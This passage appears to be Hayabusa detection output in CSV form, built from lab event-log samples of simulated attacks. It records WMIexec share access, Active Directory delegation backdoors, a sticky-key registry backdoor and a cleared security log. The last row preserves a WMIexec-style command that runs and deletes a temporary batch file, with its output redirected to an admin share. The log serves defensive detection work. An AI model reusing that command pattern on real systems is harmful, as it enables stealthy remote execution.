0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.308 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator 
ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: 
\??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.367 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" -2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.406 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.441 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network 
Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 
+09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this 
computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor 
Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx -2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process 
